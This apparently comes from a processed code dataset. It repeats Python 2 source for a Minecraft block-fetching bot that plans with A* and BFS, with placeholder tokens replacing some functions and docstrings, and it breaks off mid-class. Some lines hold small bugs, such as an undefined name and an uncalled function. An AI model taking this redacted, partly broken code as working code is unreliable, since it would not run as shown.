_GenericBot:\n <docstring token>\n\n def __init__(self, pos, inventory=None):\n \"\"\"Initialize with an empty inventory.\n\n inventory is a dictionary. If None, an empty one will be used.\"\"\"\n if inventory is None:\n self._inventory = {}\n else:\n self._inventory = deepcopy(inventory)\n self._pos = deepcopy(pos)\n <function token>\n\n def take_actions(self, actions, seconds=None):\n \"\"\"Take these actions. If seconds is not None, sleep 'seconds' \n seconds.\n \"\"\"\n if not actions:\n return\n self.take_action(actions[0])\n for action in actions[1:]:\n if seconds is not None:\n sleep(seconds)\n self.take_action(action)\n <function token>\n\n def get_legal_actions(self, block_=None):\n \"\"\"Return a list of legal actions.\n\n If block_ is None, return all legal actions. Otherwise, return all\n legal actions that don't involve placing the block.\"\"\"\n return self._get_move_actions(block_) + self._get_mine_actions(\n ) + self._get_placement_actions(block_)\n\n def contains(self, block_):\n \"\"\"Return whether or not the bot contains the block id.\"\"\"\n return block_ in self._inventory\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n raise NotImplementedError\n\n def _place(self, loc, exclude=None, block_=None):\n \"\"\"Place a block from the inventory only.\n\n If exclude is not None, place a block that is not 'exclude'.\n If block is not None, place that block only.\n \"\"\"\n if not self._inventory:\n raise Exception('Inventory empty')\n if block_ is None:\n for key in self._inventory:\n if key != exclude:\n block_ = key\n break\n else:\n raise Exception(\n 'You requested not to place %s, but it is the only block in the inventory.'\n % exclude)\n if block_ not in self._inventory:\n raise Exception('Block %s is not in the inventory' % block_)\n if self._inventory[block_] == 1:\n del self._inventory[block_]\n else:\n self._inventory[block_] -= 1\n self._set_block(loc, block_)\n\n def _move_down(self):\n \"\"\"Move and mine the block below.\"\"\"\n new_pos = self._pos + _Vec3(0, -1, 0)\n block_ = self._get_block(new_pos)\n if block_ != _WATER:\n self._add_to_inv(block_)\n self._move(new_pos)\n <function token>\n <function token>\n\n def _mine(self, loc):\n \"\"\"Mine the block.\"\"\"\n block_ = self._get_block(loc)\n self._add_to_inv(block_)\n self._set_block(loc, _AIR)\n\n def _get_move_actions(self, exclude=None):\n \"\"\"Return a list of legal movement actions.\n\n exclude is the block to exclude.\n \"\"\"\n rtn = []\n can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,\n _WATER}\n if can_move_up:\n if self._surrounded():\n rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0, \n 1, 0),)})\n else:\n rtn.append({'func': '_move_up', 'args': (exclude,)})\n hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))\n if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:\n rtn.append({'func': '_move_down'})\n for dir_ in _adj_dirs():\n rtn.extend(self._side_moves(dir_, can_move_up))\n return rtn\n\n def _side_moves(self, dir_, can_move_up):\n \"\"\"Return the list of side moves.\n\n dir_ is an adjacent direction.\n can_move_up is a boolean for whether or not the bot can move up.\n \"\"\"\n rtn = []\n base_pos = self._pos + dir_\n base_block = self._get_block(base_pos)\n empty_blocks = {_AIR, _WATER}\n if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:\n for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n rtn.append({'func': '_move', 'args': (base_pos + _Vec3(0, 1,\n 0),)})\n for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n pos = base_pos + _Vec3(0, -1, 0)\n for _ in xrange(_DROP_PLUS_1):\n block_ = self._get_block(pos)\n if block_ != _AIR:\n if block_ != _LAVA:\n rtn.append({'func': '_move', 'args': (pos + _Vec3(0,\n 1, 0),)})\n break\n pos.y -= 1\n\n def _surrounded(self):\n \"\"\"Return whether or not the bot is surrounded by water.\"\"\"\n for dir_ in _adj_dirs():\n if self._get_block(self._pos + dir_) != _WATER:\n return False\n return True\n\n def _get_mine_actions(self):\n \"\"\"Return a list of legal mining actions (that only involve mining\n and not moving).\"\"\"\n rtn = []\n dont_mine = {_AIR, _WATER, _LAVA}\n pos_above = self._pos + _Vec3(0, 2, 0)\n if self._get_block(pos_above) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos_above,)})\n for dir_ in _adj_dirs():\n pos = self._pos + dir_\n for _ in xrange(2):\n if self._get_block(pos) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos,)})\n pos = pos + _Vec3(0, 1, 0)\n return rtn\n\n def _get_placement_actions(self, exclude=None):\n \"\"\"Return a list of legal actions that only involve placing a block\n from the inventory.\n\n exclude is a block id. It is the block that should not be placed. If None,\n any block can be placed.\"\"\"\n if not self._has_blocks_to_place(exclude=exclude):\n return []\n dirs = [_Vec3(0, 2, 0)]\n for dir_ in _adj_dirs():\n dirs.extend([dir_, dir_ + _Vec3(0, 1, 0)])\n if self._get_block(self._pos + dir_) in [_AIR, _WATER]:\n dirs.append(dir_ + _Vec3(0, -1, 0))\n rtn = []\n for dir_ in dirs:\n pos = self._pos + dir_\n if self._can_place(pos):\n rtn.append({'func': '_place', 'args': (pos,), 'kwargs': {\n 'exclude': exclude}})\n return rtn\n\n def _can_place(self, loc):\n \"\"\"Return whether or not the bot can place a block at that location\n independent of what it has in its inventory.\"\"\"\n non_blocks = [_AIR, _WATER, _LAVA]\n player = [self._pos, self._pos + _Vec3(0, 1, 0)]\n for dir_ in (_adj_dirs + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]):\n new_loc = loc + dir_\n if new_loc not in player and self._get_block(new_loc\n ) not in non_blocks:\n return True\n return False\n\n def _has_blocks_to_place(self, exclude=None):\n \"\"\"Return whether or not the bot can place a block from the\n inventory. If exclude is None, any block can be placed.\"\"\"\n for block_ in self._inventory:\n if block_ != exclude:\n return True\n return False\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n raise NotImplementedError\n\n def _move(self, pos):\n \"\"\"Move there only.\"\"\"\n self._pos = deepcopy(pos)\n\n\nclass _ImaginaryBot(_GenericBot):\n \"\"\"A bot used for finding paths that doesn't actually change blocks\n in the world.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Create a new bot.\"\"\"\n _GenericBot.__init__(self, pos, inventory)\n self._changes = {}\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n self._changes[deepcopy(pos)] = block\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n if pos in self._changes:\n return self._changes[pos]\n else:\n return _get_mc().getBlock(pos)\n\n def get_block(self, pos):\n \"\"\"The public version.\"\"\"\n return self._get_block(pos)\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n _key_vals(self._changes)))\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n\n\nclass _GenericBot:\n <docstring token>\n\n def __init__(self, pos, inventory=None):\n \"\"\"Initialize with an empty inventory.\n\n inventory is a dictionary. If None, an empty one will be used.\"\"\"\n if inventory is None:\n self._inventory = {}\n else:\n self._inventory = deepcopy(inventory)\n self._pos = deepcopy(pos)\n <function token>\n\n def take_actions(self, actions, seconds=None):\n \"\"\"Take these actions. If seconds is not None, sleep 'seconds' \n seconds.\n \"\"\"\n if not actions:\n return\n self.take_action(actions[0])\n for action in actions[1:]:\n if seconds is not None:\n sleep(seconds)\n self.take_action(action)\n <function token>\n\n def get_legal_actions(self, block_=None):\n \"\"\"Return a list of legal actions.\n\n If block_ is None, return all legal actions. Otherwise, return all\n legal actions that don't involve placing the block.\"\"\"\n return self._get_move_actions(block_) + self._get_mine_actions(\n ) + self._get_placement_actions(block_)\n\n def contains(self, block_):\n \"\"\"Return whether or not the bot contains the block id.\"\"\"\n return block_ in self._inventory\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n raise NotImplementedError\n\n def _place(self, loc, exclude=None, block_=None):\n \"\"\"Place a block from the inventory only.\n\n If exclude is not None, place a block that is not 'exclude'.\n If block is not None, place that block only.\n \"\"\"\n if not self._inventory:\n raise Exception('Inventory empty')\n if block_ is None:\n for key in self._inventory:\n if key != exclude:\n block_ = key\n break\n else:\n raise Exception(\n 'You requested not to place %s, but it is the only block in the inventory.'\n % exclude)\n if block_ not in self._inventory:\n raise Exception('Block %s is not in the inventory' % block_)\n if self._inventory[block_] == 1:\n del self._inventory[block_]\n else:\n self._inventory[block_] -= 1\n self._set_block(loc, block_)\n\n def _move_down(self):\n \"\"\"Move and mine the block below.\"\"\"\n new_pos = self._pos + _Vec3(0, -1, 0)\n block_ = self._get_block(new_pos)\n if block_ != _WATER:\n self._add_to_inv(block_)\n self._move(new_pos)\n <function token>\n <function token>\n <function token>\n\n def _get_move_actions(self, exclude=None):\n \"\"\"Return a list of legal movement actions.\n\n exclude is the block to exclude.\n \"\"\"\n rtn = []\n can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,\n _WATER}\n if can_move_up:\n if self._surrounded():\n rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0, \n 1, 0),)})\n else:\n rtn.append({'func': '_move_up', 'args': (exclude,)})\n hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))\n if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:\n rtn.append({'func': '_move_down'})\n for dir_ in _adj_dirs():\n rtn.extend(self._side_moves(dir_, can_move_up))\n return rtn\n\n def _side_moves(self, dir_, can_move_up):\n \"\"\"Return the list of side moves.\n\n dir_ is an adjacent direction.\n can_move_up is a boolean for whether or not the bot can move up.\n \"\"\"\n rtn = []\n base_pos = self._pos + dir_\n base_block = self._get_block(base_pos)\n empty_blocks = {_AIR, _WATER}\n if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:\n for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n rtn.append({'func': '_move', 'args': (base_pos + _Vec3(0, 1,\n 0),)})\n for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n pos = base_pos + _Vec3(0, -1, 0)\n for _ in xrange(_DROP_PLUS_1):\n block_ = self._get_block(pos)\n if block_ != _AIR:\n if block_ != _LAVA:\n rtn.append({'func': '_move', 'args': (pos + _Vec3(0,\n 1, 0),)})\n break\n pos.y -= 1\n\n def _surrounded(self):\n \"\"\"Return whether or not the bot is surrounded by water.\"\"\"\n for dir_ in _adj_dirs():\n if self._get_block(self._pos + dir_) != _WATER:\n return False\n return True\n\n def _get_mine_actions(self):\n \"\"\"Return a list of legal mining actions (that only involve mining\n and not moving).\"\"\"\n rtn = []\n dont_mine = {_AIR, _WATER, _LAVA}\n pos_above = self._pos + _Vec3(0, 2, 0)\n if self._get_block(pos_above) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos_above,)})\n for dir_ in _adj_dirs():\n pos = self._pos + dir_\n for _ in xrange(2):\n if self._get_block(pos) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos,)})\n pos = pos + _Vec3(0, 1, 0)\n return rtn\n\n def _get_placement_actions(self, exclude=None):\n \"\"\"Return a list of legal actions that only involve placing a block\n from the inventory.\n\n exclude is a block id. It is the block that should not be placed. If None,\n any block can be placed.\"\"\"\n if not self._has_blocks_to_place(exclude=exclude):\n return []\n dirs = [_Vec3(0, 2, 0)]\n for dir_ in _adj_dirs():\n dirs.extend([dir_, dir_ + _Vec3(0, 1, 0)])\n if self._get_block(self._pos + dir_) in [_AIR, _WATER]:\n dirs.append(dir_ + _Vec3(0, -1, 0))\n rtn = []\n for dir_ in dirs:\n pos = self._pos + dir_\n if self._can_place(pos):\n rtn.append({'func': '_place', 'args': (pos,), 'kwargs': {\n 'exclude': exclude}})\n return rtn\n\n def _can_place(self, loc):\n \"\"\"Return whether or not the bot can place a block at that location\n independent of what it has in its inventory.\"\"\"\n non_blocks = [_AIR, _WATER, _LAVA]\n player = [self._pos, self._pos + _Vec3(0, 1, 0)]\n for dir_ in (_adj_dirs + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]):\n new_loc = loc + dir_\n if new_loc not in player and self._get_block(new_loc\n ) not in non_blocks:\n return True\n return False\n\n def _has_blocks_to_place(self, exclude=None):\n \"\"\"Return whether or not the bot can place a block from the\n inventory. If exclude is None, any block can be placed.\"\"\"\n for block_ in self._inventory:\n if block_ != exclude:\n return True\n return False\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n raise NotImplementedError\n\n def _move(self, pos):\n \"\"\"Move there only.\"\"\"\n self._pos = deepcopy(pos)\n\n\nclass _ImaginaryBot(_GenericBot):\n \"\"\"A bot used for finding paths that doesn't actually change blocks\n in the world.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Create a new bot.\"\"\"\n _GenericBot.__init__(self, pos, inventory)\n self._changes = {}\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n self._changes[deepcopy(pos)] = block\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n if pos in self._changes:\n return self._changes[pos]\n else:\n return _get_mc().getBlock(pos)\n\n def get_block(self, pos):\n \"\"\"The public version.\"\"\"\n return self._get_block(pos)\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n _key_vals(self._changes)))\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n\n\nclass _GenericBot:\n <docstring token>\n\n def __init__(self, pos, inventory=None):\n \"\"\"Initialize with an empty inventory.\n\n inventory is a dictionary. If None, an empty one will be used.\"\"\"\n if inventory is None:\n self._inventory = {}\n else:\n self._inventory = deepcopy(inventory)\n self._pos = deepcopy(pos)\n <function token>\n\n def take_actions(self, actions, seconds=None):\n \"\"\"Take these actions. If seconds is not None, sleep 'seconds' \n seconds.\n \"\"\"\n if not actions:\n return\n self.take_action(actions[0])\n for action in actions[1:]:\n if seconds is not None:\n sleep(seconds)\n self.take_action(action)\n <function token>\n\n def get_legal_actions(self, block_=None):\n \"\"\"Return a list of legal actions.\n\n If block_ is None, return all legal actions. Otherwise, return all\n legal actions that don't involve placing the block.\"\"\"\n return self._get_move_actions(block_) + self._get_mine_actions(\n ) + self._get_placement_actions(block_)\n\n def contains(self, block_):\n \"\"\"Return whether or not the bot contains the block id.\"\"\"\n return block_ in self._inventory\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n raise NotImplementedError\n\n def _place(self, loc, exclude=None, block_=None):\n \"\"\"Place a block from the inventory only.\n\n If exclude is not None, place a block that is not 'exclude'.\n If block is not None, place that block only.\n \"\"\"\n if not self._inventory:\n raise Exception('Inventory empty')\n if block_ is None:\n for key in self._inventory:\n if key != exclude:\n block_ = key\n break\n else:\n raise Exception(\n 'You requested not to place %s, but it is the only block in the inventory.'\n % exclude)\n if block_ not in self._inventory:\n raise Exception('Block %s is not in the inventory' % block_)\n if self._inventory[block_] == 1:\n del self._inventory[block_]\n else:\n self._inventory[block_] -= 1\n self._set_block(loc, block_)\n\n def _move_down(self):\n \"\"\"Move and mine the block below.\"\"\"\n new_pos = self._pos + _Vec3(0, -1, 0)\n block_ = self._get_block(new_pos)\n if block_ != _WATER:\n self._add_to_inv(block_)\n self._move(new_pos)\n <function token>\n <function token>\n <function token>\n\n def _get_move_actions(self, exclude=None):\n \"\"\"Return a list of legal movement actions.\n\n exclude is the block to exclude.\n \"\"\"\n rtn = []\n can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,\n _WATER}\n if can_move_up:\n if self._surrounded():\n rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0, \n 1, 0),)})\n else:\n rtn.append({'func': '_move_up', 'args': (exclude,)})\n hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))\n if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:\n rtn.append({'func': '_move_down'})\n for dir_ in _adj_dirs():\n rtn.extend(self._side_moves(dir_, can_move_up))\n return rtn\n\n def _side_moves(self, dir_, can_move_up):\n \"\"\"Return the list of side moves.\n\n dir_ is an adjacent direction.\n can_move_up is a boolean for whether or not the bot can move up.\n \"\"\"\n rtn = []\n base_pos = self._pos + dir_\n base_block = self._get_block(base_pos)\n empty_blocks = {_AIR, _WATER}\n if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:\n for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n rtn.append({'func': '_move', 'args': (base_pos + _Vec3(0, 1,\n 0),)})\n for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n pos = base_pos + _Vec3(0, -1, 0)\n for _ in xrange(_DROP_PLUS_1):\n block_ = self._get_block(pos)\n if block_ != _AIR:\n if block_ != _LAVA:\n rtn.append({'func': '_move', 'args': (pos + _Vec3(0,\n 1, 0),)})\n break\n pos.y -= 1\n\n def _surrounded(self):\n \"\"\"Return whether or not the bot is surrounded by water.\"\"\"\n for dir_ in _adj_dirs():\n if self._get_block(self._pos + dir_) != _WATER:\n return False\n return True\n\n def _get_mine_actions(self):\n \"\"\"Return a list of legal mining actions (that only involve mining\n and not moving).\"\"\"\n rtn = []\n dont_mine = {_AIR, _WATER, _LAVA}\n pos_above = self._pos + _Vec3(0, 2, 0)\n if self._get_block(pos_above) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos_above,)})\n for dir_ in _adj_dirs():\n pos = self._pos + dir_\n for _ in xrange(2):\n if self._get_block(pos) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos,)})\n pos = pos + _Vec3(0, 1, 0)\n return rtn\n <function token>\n\n def _can_place(self, loc):\n \"\"\"Return whether or not the bot can place a block at that location\n independent of what it has in its inventory.\"\"\"\n non_blocks = [_AIR, _WATER, _LAVA]\n player = [self._pos, self._pos + _Vec3(0, 1, 0)]\n for dir_ in (_adj_dirs + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]):\n new_loc = loc + dir_\n if new_loc not in player and self._get_block(new_loc\n ) not in non_blocks:\n return True\n return False\n\n def _has_blocks_to_place(self, exclude=None):\n \"\"\"Return whether or not the bot can place a block from the\n inventory. If exclude is None, any block can be placed.\"\"\"\n for block_ in self._inventory:\n if block_ != exclude:\n return True\n return False\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n raise NotImplementedError\n\n def _move(self, pos):\n \"\"\"Move there only.\"\"\"\n self._pos = deepcopy(pos)\n\n\nclass _ImaginaryBot(_GenericBot):\n \"\"\"A bot used for finding paths that doesn't actually change blocks\n in the world.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Create a new bot.\"\"\"\n 